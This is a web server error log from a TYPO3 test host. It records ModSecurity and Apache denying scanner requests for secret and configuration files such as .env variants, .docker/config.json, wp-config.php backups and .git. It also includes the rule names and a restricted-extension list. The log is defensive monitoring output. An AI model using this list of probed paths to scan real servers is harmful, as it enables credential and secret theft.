[Sun Jan 18 08:30:48.000582 2026] [authz_core:error] [pid 1490422] [client 185.177.72.66:6204] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/env.yml
[Sun Jan 18 08:30:50.089748 2026] [:error] [pid 1490422] [client 185.177.72.66:6342] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /_nuxt/builds/latest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/_nuxt/builds/latest/.env"] [unique_id "aWyMKpY4_YWQnzrblW6AXgAAAA0"]
[Sun Jan 18 08:30:50.089957 2026] [:error] [pid 1490422] [client 185.177.72.66:6342] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_nuxt/builds/latest/.env"] [unique_id "aWyMKpY4_YWQnzrblW6AXgAAAA0"]
[Sun Jan 18 08:30:50.090114 2026] [:error] [pid 1490422] [client 185.177.72.66:6342] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_nuxt/builds/latest/.env"] [unique_id "aWyMKpY4_YWQnzrblW6AXgAAAA0"]
[Sun Jan 18 08:30:50.099717 2026] [:error] [pid 1488686] [client 185.177.72.66:6294] [client 185.177.72.66] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWyMKssdzFjjXY44eoPo7QAAAAg"]
[Sun Jan 18 08:30:50.099924 2026] [:error] [pid 1488686] [client 185.177.72.66:6294] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWyMKssdzFjjXY44eoPo7QAAAAg"]
[Sun Jan 18 08:30:50.100092 2026] [:error] [pid 1488686] [client 185.177.72.66:6294] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aWyMKssdzFjjXY44eoPo7QAAAAg"]
[Sun Jan 18 08:30:50.267455 2026] [authz_core:error] [pid 1490427] [client 185.177.72.66:6390] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jan 18 08:30:50.419231 2026] [authz_core:error] [pid 1488394] [client 185.177.72.66:6480] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application-production.yml
[Sun Jan 18 08:30:50.567574 2026] [:error] [pid 1490423] [client 185.177.72.66:6602] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.phpinfo.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.phpinfo.php"] [unique_id "aWyMKj5UUmmifVbk5ArUAwAAAA4"]
[Sun Jan 18 08:30:50.567760 2026] [:error] [pid 1490423] [client 185.177.72.66:6602] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.phpinfo.php"] [unique_id "aWyMKj5UUmmifVbk5ArUAwAAAA4"]
[Sun Jan 18 08:30:50.567914 2026] [:error] [pid 1490423] [client 185.177.72.66:6602] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.phpinfo.php"] [unique_id "aWyMKj5UUmmifVbk5ArUAwAAAA4"]
[Sun Jan 18 08:30:50.569431 2026] [:error] [pid 1490420] [client 185.177.72.66:6564] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWyMKmiGArOZVa4E_tBQcgAAAAs"]
[Sun Jan 18 08:30:50.569607 2026] [:error] [pid 1490420] [client 185.177.72.66:6564] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWyMKmiGArOZVa4E_tBQcgAAAAs"]
[Sun Jan 18 08:30:50.569752 2026] [:error] [pid 1490420] [client 185.177.72.66:6564] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.json"] [unique_id "aWyMKmiGArOZVa4E_tBQcgAAAAs"]
[Sun Jan 18 08:30:50.577283 2026] [authz_core:error] [pid 1488686] [client 185.177.72.66:6606] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.yaml
[Sun Jan 18 08:30:50.691794 2026] [:error] [pid 1490420] [client 185.177.72.66:6612] [client 185.177.72.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.phpinfo"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.phpinfo"] [unique_id "aWyMKmiGArOZVa4E_tBQcwAAAAs"]
[Sun Jan 18 08:30:50.692005 2026] [:error] [pid 1490420] [client 185.177.72.66:6612] [client 185.177.72.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.phpinfo"] [unique_id "aWyMKmiGArOZVa4E_tBQcwAAAAs"]
[Sun Jan 18 08:30:50.692157 2026] [:error] [pid 1490420] [client 185.177.72.66:6612] [client 185.177.72.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.phpinfo"] [unique_id "aWyMKmiGArOZVa4E_tBQcwAAAAs"]
[Mon Jan 19 01:46:38.468071 2026] [authz_core:error] [pid 1507078] [client 142.93.102.171:35090] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 19 14:06:13.170613 2026] [authz_core:error] [pid 1519558] [client 45.130.203.186:58603] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 19 19:21:24.272840 2026] [:error] [pid 1519577] [client 195.178.110.132:49468] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JPEO9lglBzrqFO2MugAAAAs"]
[Mon Jan 19 19:21:24.273094 2026] [:error] [pid 1519577] [client 195.178.110.132:49468] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JPEO9lglBzrqFO2MugAAAAs"]
[Mon Jan 19 19:21:24.273288 2026] [:error] [pid 1519577] [client 195.178.110.132:49468] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JPEO9lglBzrqFO2MugAAAAs"]
[Mon Jan 19 19:21:24.354597 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JNdahQ2OPvs91_sukQAAAAA"]
[Mon Jan 19 19:21:24.354776 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JNdahQ2OPvs91_sukQAAAAA"]
[Mon Jan 19 19:21:24.354933 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aW52JNdahQ2OPvs91_sukQAAAAA"]
[Mon Jan 19 19:21:24.375977 2026] [authz_core:error] [pid 1509524] [client 195.178.110.132:49492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Mon Jan 19 19:21:24.397424 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aW52JNdahQ2OPvs91_sukwAAAAA"]
[Mon Jan 19 19:21:24.397659 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aW52JNdahQ2OPvs91_sukwAAAAA"]
[Mon Jan 19 19:21:24.397818 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aW52JNdahQ2OPvs91_sukwAAAAA"]
[Mon Jan 19 19:21:24.419126 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aW52JNdahQ2OPvs91_sulAAAAAA"]
[Mon Jan 19 19:21:24.419328 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aW52JNdahQ2OPvs91_sulAAAAAA"]
[Mon Jan 19 19:21:24.419475 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aW52JNdahQ2OPvs91_sulAAAAAA"]
[Mon Jan 19 19:21:24.447226 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aW52JNdahQ2OPvs91_sulQAAAAA"]
[Mon Jan 19 19:21:24.447434 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aW52JNdahQ2OPvs91_sulQAAAAA"]
[Mon Jan 19 19:21:24.447584 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aW52JNdahQ2OPvs91_sulQAAAAA"]
[Mon Jan 19 19:21:24.470242 2026] [authz_core:error] [pid 1509524] [client 195.178.110.132:49492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 19 19:21:24.491527 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aW52JNdahQ2OPvs91_sulwAAAAA"]
[Mon Jan 19 19:21:24.491747 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aW52JNdahQ2OPvs91_sulwAAAAA"]
[Mon Jan 19 19:21:24.491900 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aW52JNdahQ2OPvs91_sulwAAAAA"]
[Mon Jan 19 19:21:24.512984 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aW52JNdahQ2OPvs91_sumAAAAAA"]
[Mon Jan 19 19:21:24.513122 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aW52JNdahQ2OPvs91_sumAAAAAA"]
[Mon Jan 19 19:21:24.513321 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aW52JNdahQ2OPvs91_sumAAAAAA"]
[Mon Jan 19 19:21:24.513509 2026] [:error] [pid 1509524] [client 195.178.110.132:49492] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aW52JNdahQ2OPvs91_sumAAAAAA"]
[Mon Jan 19 19:21:24.575441 2026] [authz_core:error] [pid 1509524] [client 195.178.110.132:49492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Mon Jan 19 19:21:24.709210 2026] [authz_core:error] [pid 1509524] [client 195.178.110.132:49492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 19 19:21:24.730297 2026] [authz_core:error] [pid 1509524] [client 195.178.110.132:49492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
